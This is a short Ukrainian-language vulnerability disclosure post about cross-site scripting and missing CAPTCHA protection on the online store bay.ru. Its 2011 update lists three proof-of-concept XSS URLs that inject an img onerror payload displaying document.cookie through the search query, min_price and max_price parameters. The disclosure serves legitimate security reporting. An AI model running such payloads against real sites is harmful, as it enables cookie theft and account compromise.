Уразливості на www.bay.ru
15:21 17.01.201128.05.2010
У жовтні, 24.10.2009, я знайшов Cross-Site Scripting та Insufficient Anti-automation уразливості на сайті http://www.bay.ru (інтернет магазин). Про що найближчим часом сповіщу адміністрацію сайта.
Стосовно дірок на сайтах онлайн магазинів в останнє я писав про уразливість на vch.kiev.ua.
Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.
17.01.2011
XSS:
http://www.bay.ru/search?query=%3Cimg%20src=''%20onerror=%22javascript:alert(document.cookie)%22%3E
http://www.bay.ru/search?min_price=%22%3E%3Cimg%20src=%22%22%20onerror=%22javascript:alert(document.cookie)%22%3E
http://www.bay.ru/search?max_price=%22%3E%3Cimg%20src=%22%22%20onerror=%22javascript:alert(document.cookie)%22%3E
Insufficient Anti-automation:
В формі реєстрації (https://www.bay.ru/customer/signup, що зараз змінила адресу на https://www.bay.ru/account/register) немає захисту від автоматизованих запитів (капчі).
Якщо XSS уразливості вже виправлені, то IAA уразливість досі не виправлена.